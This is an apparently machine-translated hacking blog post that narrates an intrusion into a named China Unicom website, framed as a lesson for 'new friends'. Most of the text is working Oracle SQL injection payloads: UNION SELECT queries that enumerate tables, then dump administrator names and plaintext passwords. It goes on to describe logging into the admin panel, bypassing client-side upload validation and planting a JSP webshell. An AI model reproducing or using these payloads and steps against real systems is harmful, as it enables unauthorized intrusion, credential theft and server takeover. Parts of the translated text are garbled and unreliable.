ORACLE injection detection successfully won a Unicom site
A Security penetration test on China Unicom's website. Next I will write down the penetration test process in detail for new friends to learn. The level is still completely dependent on hacker tools to intrude friends can work hard.
Previous information penetration is indispensable, but I don't need large hacker scanning software here, because large scanning software sends a large number of data packets, which can easily block the network, sometimes depending on the situation. Let's start with the WEB system. Open the China Unicom site. The site is very beautiful. A look at the program is JSP, unexpected, because many large sites love to use JSP architecture. Open google search engine to collect dynamic pages of the site. Then, test each dynamic connection one by one to check whether the injection vulnerability exists. After my careful detection, I finally found something. This URL is the address of the city column. If you submit a single quotation mark, an error is reported immediately. Then use the classic and 1 = 1 test to return normal 1:
The returned results with and 1 = 2 are abnormal, and the injection vulnerability exists. According to my usual intrusion experience, the background of such a system should not be a small database, but probably an ORACLE database. The Dual table is unique to the ORACLE database. Let's see if it exists. If it exists, it indicates that the database is ORACLE. Submit: And0 <> (select count (*) from dual). The normal page is returned. 2:
The database is now clear, and now we can guess the number of fields. Submit: order by 1 --, returns normal. Continue to change the number submission. When it is submitted to order by 7, the return result is abnormal. If Order by 6-is normal, the number of fields is 6. Now we construct a query statement: and 1 = 1 null, null from dual-Some may ask why we don't need 1, 2, 3, 4, 5, 6?
Because the ORACLE database does not automatically match the data type, and null can match any data type, no error will be reported for submission. We submitted it and returned a normal page. now let's check the data type of the current field. We add ''quotation marks before and after null. If the returned result is normal, it indicates that the field is Numeric. If the returned error is numeric, if it is not a numeric type, it is another type.
After my test, the normal page is returned when a single quotation mark is added at the position 2nd 4 6, which indicates that these fields are character-type.
Statement submitted: and % 201 = 1% 20 union % 20 select % 20 null, 'null', null, 'null', null, 'null' % 20 from % 20dual-3
Now, replace null that is not enclosed in single quotes with the corresponding number. Submit: and % 201 = 2% 20 union % 20 select % 201, 'null', 3, 'null', 5, 'null' % 20 from % 20dual-4:
The figure shows two null values. Now we replace all null values with the corresponding numbers: and % 201 = 2% 20 union % 20 select % 201, '2', 3, '4', 5, '6' % 20 from % 20dual-5:
Finally, number 2 is displayed. Wait for us to use the data we want.
Now let's take a look at the ORACLE database version and replace Number 2 with (selectbanner from sys. v _ $ version where rownum = 1), complete statement: and % 201 = 2% 20 union % 20 select % 201, (select % 20 banner % 20 from % 20sys. v _ $ version % 20 where % 20 rownum = 1), 3, '4', 5, '6' % 20 from % 20dual-6:
The username of the CURRENT connection is cracked. Replace number 2 with the complete statement (selectSYS_CONTEXT ('userenv', 'current _ user') from dual: and % 201 = 2% 20 union % 20 select % 201, (select % 20SYS_CONTEXT % 20 ('userenv', % 20'current _ user') % 20 from % 20 dual ), 3, '4', 5, '6' % 20 from % 20dual-the current connection user is CHINAUNICOM, 7:
We continue to blow up the operating system version and replace it with: (select member from v $ logfilewhere rownum = 1) complete statement: and % 201 = 2% 20 union % 20 select % 201, (select % 20 member % 20 from % 20 v $ logfile % 20 where % 20 rownum = 1), 3, '4', 5, '6' % 20 from % 20dual-according to the path characteristics of the system, this system is not WINDOWS 8:
Now let's guess the Administrator's table name and submit the complete statement (select count (*) from admin:
And % 201 = 2% 20 union % 20 select % 201, (select % 20 count (*) % 20 from % 20 admin), 3, '4', 5, '6' % 20 from % 20dual-an error is returned. Replace admin with user manage manager admin_user... and so on. It is not a regular table segment. Since we can't solve the problem by regular guesses, we can expose all the tables in the database. Let's take a look at the power of ORACLE. Statement:
And % 201 = 2% 20 union % 20 select % 201, TABLE_NAME, 3, '4', 5, '6' % 20 from % 20USER_TABLES-the table name is successfully displayed, 9:
Dozens of tables are exposed. We can find sensitive fields. We mainly find the fields for storing management passwords. I listed these fields T_BB_USER T_USER UNICOM_USERUPOWER_USER. With the table, we will pop up the fields in the table. The statement is:
And % 201 = 2% 20 union % 20 select % 201, COLUMN_NAME, 3, '4', 5, '6' % 20 from % 20 COLS % 20 where % 20TABLE_NAME = 'name of the table to be exploded '--, We will pop up the fields in the T_USER table, 10:
The result shows that the management table is not the one. We continue to try it until we find that the table is UNICOM_USER. All management users of the table are exposed:
And % 201 = 2% 20 union % 20 select % 201, NAME, 3, '4', 5, '6' % 20 from % 20UNICOM_USER-11:
And % 201 = 2% 20 union % 20 select % 201, PASSWORD, 3, '4', 5, '6' % 20 from % 20UNICOM_USER-all management passwords are displayed, the password is plaintext. 12:
The password has been obtained. Now let's look at the background. Enter manage after the address to pop up a management login page, and use the obtained password to successfully log on. 13:
Now Let's seize the WEBSHELL permission. Click "Article management" to add news. Select a JSP script trojan for uploading attachments. Click "Submit" to bring up a dialog box immediately. Tip: select the information type! I chose to upload an image. The image can be uploaded successfully. It seems that the verification is done, and the source code of the web page is found to have been verified locally. Local verification bypass is good. Here I will provide two methods for bypassing.
1. Save the Code as an HTML file, modify the verification code, or delete the verification code, and change the submitted path to the website path.
2. Change the script Trojan format to JPG for uploading and capturing packets, modify the file name JPG to JSP in the captured packets, and then submit the file with NC.
Then we can use the first method, and the second method is more troublesome. On the upload page, right-click to view the source code, copy the code to a text file, and change the file extension to HTML.
You can change the file type that is not allowed to be uploaded to another type. You can also delete the file type that is not allowed to be uploaded. Then, change the submitted path to the website path. I modified 14:
Open it with IE after modification, and select a JSP Trojan to upload locally. Prompt that the upload is successful to obtain the WEBSHELL address. 15:
You can run the uname command to view the information of the system and find that the system is sun OS kernel version 5.9 .!
